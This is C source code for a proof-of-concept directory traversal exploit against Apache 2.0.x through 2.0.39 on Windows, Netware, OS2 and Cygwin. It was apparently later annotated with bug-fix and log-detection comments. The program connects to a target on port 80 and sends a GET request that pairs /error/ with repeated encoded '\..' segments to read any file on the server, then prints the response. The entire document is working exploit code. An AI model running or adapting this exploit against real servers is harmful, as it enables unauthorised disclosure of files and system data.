/*
 * DSR-apache2.0x by bob@dtors.net
 * Exploit found by Auriemma Luigi.
 * 
 * This is a Proof of Concept exploit for
 * the current directory traversal design flaw
 * in apache 2.0.x - 2.0.39.
 * 
 * Affected Systems:
 *
 * Windows [win32]
 * Netware
 * OS2
 * Cygwin
 *
 * This exploit allows the attacker to view ANY
 * file on the target machine if it is vulnerable
 * to this attack.
 *
 */

#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <unistd.h>
/* URL-encoded backslash: "%5c" decodes to '\'. Used as the path separator
 * between the <dir> and <file> arguments when the request is built. */
#define bs "%5c"

/*
 * Traversal prefix placed after "/error/" in the request path.
 *
 * Every byte is printable ASCII: five repetitions of "%5c%2e%2e"
 * (URL-encoded "\..") followed by one trailing "%5c". It is written
 * literally so the on-the-wire pattern is readable, which is also the
 * string a defender would search for in web-server access logs or match
 * in an IDS/WAF rule.
 */
char travcode[] =
	"%5c%2e%2e"
	"%5c%2e%2e"
	"%5c%2e%2e"
	"%5c%2e%2e"
	"%5c%2e%2e"
	"%5c";


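void reply(int sock);

/*
 * Copy everything the peer sends on `sock` to stdout until the peer closes
 * the connection or a read fails, then terminate the process with status 0.
 *
 * stdin is also watched, but whatever is typed is read and discarded; it is
 * never forwarded to the socket.
 *
 * Fixes relative to the naive loop:
 *  - read() is limited to sizeof(recvbuf) - 1 so the terminating NUL can
 *    never land one byte past the buffer (a full 1024-byte read used to
 *    write recvbuf[1024]).
 *  - output uses fwrite() with the byte count, so a response containing
 *    NUL bytes is not silently truncated.
 *  - select() failures are handled instead of testing an undefined fd_set.
 *  - stdin is dropped from the set after EOF/error, which otherwise makes
 *    select() return immediately forever (busy loop).
 *
 * NOTE(review): peer bytes are written to the terminal verbatim; a hostile
 * server can embed terminal control sequences. Pipe through a filter or
 * into a file when inspecting untrusted responses.
 */
void reply(int sock)
{
    char recvbuf[1024];
    int watch_stdin = 1;

    /* FD_SET on a descriptor outside [0, FD_SETSIZE) is undefined. */
    if (sock < 0 || sock >= FD_SETSIZE) {
        fprintf(stderr, "Socket descriptor out of range for select().\n");
        exit(1);
    }

    while (1) {
        fd_set rset;
        ssize_t n;

        FD_ZERO(&rset);
        FD_SET(sock, &rset);
        if (watch_stdin) {
            FD_SET(STDIN_FILENO, &rset);
        }

        if (select(sock + 1, &rset, NULL, NULL, NULL) < 0) {
            if (errno == EINTR) {
                continue;   /* interrupted by a signal: just retry */
            }
            perror("select");
            exit(1);
        }

        if (FD_ISSET(sock, &rset)) {
            n = read(sock, recvbuf, sizeof recvbuf - 1);
            if (n <= 0) {
                printf("Connection closed by foreign ghost.\n");
                exit(0);
            }

            recvbuf[n] = 0;
            fwrite(recvbuf, 1, (size_t)n, stdout);
            fflush(stdout);
        }

        if (watch_stdin && FD_ISSET(STDIN_FILENO, &rset)) {
            /* Drain and discard local input; nothing is sent to the peer. */
            n = read(STDIN_FILENO, recvbuf, sizeof recvbuf - 1);
            if (n <= 0) {
                watch_stdin = 0;
            }
        }
    }
}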



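/*
 * Entry point: <host> <dir> <file>.
 *
 * Resolves <host> (IPv4 only), connects to TCP port 80, sends one GET
 * request whose path is "/error/" + travcode + <dir> + bs + <file>, and
 * hands the socket to reply() to print the response.
 *
 * Detection note: the request line produced here contains "/error/"
 * followed by repeated "%5c%2e%2e"; that sequence in an access log is the
 * indicator for this probe. The file header lists the affected releases
 * and platforms.
 *
 * Fixes relative to the original:
 *  - the request is built with snprintf() and rejected if it would not fit;
 *    sprintf() into the 1024-byte buffer overflowed the stack for long
 *    <host>/<dir>/<file> arguments.
 *  - sockaddr_in is zeroed before use and the resolved address is copied
 *    only after checking it really is a 4-byte AF_INET address.
 *  - socket() and write() results are checked.
 *  - the buffer is no longer named `exp` (clashes with the libm builtin) and
 *    the unused `addr` local is gone.
 */
int main(int argc, char *argv[]) {
    int sock;
    int len;
    char request[1024];
    struct sockaddr_in sin;
    struct hostent *he;

    fprintf(stdout, "\n\tDSR-apache2.0x.c By bob.\n");
    fprintf(stdout, "Proof Of Concept Code for Apache 2.0.x 2.0.39\n");
    fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");

    if (argc < 4) {
        fprintf(stderr, "\nUsage : %s <host> <dir> <file>\n\n", argv[0]);
        exit(1);
    }

    if ((he = gethostbyname(argv[1])) == NULL) {
        fprintf(stderr, "Cumon! Gimme some socks to put on!\n\n");
        exit(1);
    }

    /* Only a 4-byte IPv4 address fits sin.sin_addr; never trust h_length
     * as the copy size. */
    if (he->h_addrtype != AF_INET ||
        he->h_length != (int)sizeof sin.sin_addr ||
        he->h_addr_list[0] == NULL) {
        fprintf(stderr, "Resolver did not return an IPv4 address.\n");
        exit(1);
    }

    /* A fresh pair of clean socks ;) */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        exit(1);
    }

    memset(&sin, 0, sizeof sin);
    memcpy(&sin.sin_addr, he->h_addr_list[0], sizeof sin.sin_addr);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);

    /* yummy fresh smelling */
    fprintf(stdout, "Hold up bish connecting to host... \n");
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
        fprintf(stderr, "My socks are all sweaty.\n");
        close(sock);
        exit(1);
    }

    /* im exhausted after that...gn */
    sleep(3);

    len = snprintf(request, sizeof request,
                   "GET /error/%s%s%s%s HTTP/1.1\r\nHost: %s\r\n\r\n",
                   travcode, argv[2], bs, argv[3], argv[1]);
    if (len < 0 || (size_t)len >= sizeof request) {
        fprintf(stderr, "Request does not fit in %zu bytes.\n", sizeof request);
        close(sock);
        exit(1);
    }

    if (write(sock, request, (size_t)len) != (ssize_t)len) {
        perror("write");
        close(sock);
        exit(1);
    }

    fprintf(stdout, "This is not going to be pritty.\nIm a lion here me ROAR!\n\n");
    reply(sock);

    close(sock);
    exit(0);
}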











